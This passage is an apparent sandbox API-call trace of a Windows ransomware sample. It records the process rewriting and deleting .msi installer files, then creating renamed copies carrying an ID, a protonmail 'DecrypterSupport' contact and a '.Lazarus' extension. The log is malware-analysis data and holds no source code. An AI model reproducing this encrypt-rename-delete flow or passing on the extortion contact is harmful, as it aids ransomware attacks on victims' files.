hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.470] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.470] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.470] SetLastError (dwErrCode=0x0) [0078.470] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.471] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.471] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] SetLastError (dwErrCode=0x0) [0078.471] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x200, lpOverlapped=0x0) returned 1 [0078.471] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0078.472] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.472] SetLastError (dwErrCode=0x0) [0078.472] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x200, lpOverlapped=0x0) returned 1 [0078.472] SetLastError (dwErrCode=0x0) [0078.472] SetLastError (dwErrCode=0x0) [0078.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0078.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0078.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0078.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0078.472] CloseHandle (hObject=0x428) returned 1 [0078.477] CloseHandle (hObject=0x430) returned 1 [0078.477] AreFileApisANSI () returned 1 [0078.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0078.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0078.477] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.612] GetFileType (hFile=0x428) returned 0x1 [0078.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0078.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0078.612] GetLastError () returned 0xb7 [0078.612] SetLastError (dwErrCode=0xb7) [0078.612] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0078.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0078.613] CloseHandle (hObject=0x428) returned 1 [0078.613] AreFileApisANSI () returned 1 [0078.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cd40 [0078.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0078.613] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0078.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0078.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.615] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x1, dwReserved1=0x0, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0078.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0078.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0078.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0078.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0078.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0078.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.616] AreFileApisANSI () returned 1 [0078.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", lpUsedDefaultChar=0x0) returned 39 [0078.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0078.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0078.616] AreFileApisANSI () returned 1 [0078.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6ce48 [0078.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0078.616] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.616] GetFileType (hFile=0x428) returned 0x1 [0078.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0078.617] CloseHandle (hObject=0x428) returned 1 [0078.617] AreFileApisANSI () returned 1 [0078.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d4d0 [0078.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0078.617] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.618] GetFileType (hFile=0x428) returned 0x1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0078.618] CloseHandle (hObject=0x428) returned 1 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0078.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0078.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0078.619] AreFileApisANSI () returned 1 [0078.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cfa8 [0078.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6cfa8, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0078.619] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200)) returned 1 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0078.619] AreFileApisANSI () returned 1 [0078.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0078.619] GetLastError () returned 0x0 [0078.619] SetLastError (dwErrCode=0x0) [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0d8 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0078.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0078.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0078.620] GetLastError () returned 0x0 [0078.620] SetLastError (dwErrCode=0x0) [0078.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0078.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0078.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0078.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0078.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0078.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0078.900] AreFileApisANSI () returned 1 [0078.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0078.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xca) returned 0x74868 [0078.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x74868, cchWideChar=101 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 101 [0078.900] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.902] GetFileType (hFile=0x428) returned 0x1 [0078.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74868 | out: hHeap=0x20000) returned 1 [0078.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0078.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0078.902] AreFileApisANSI () returned 1 [0078.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 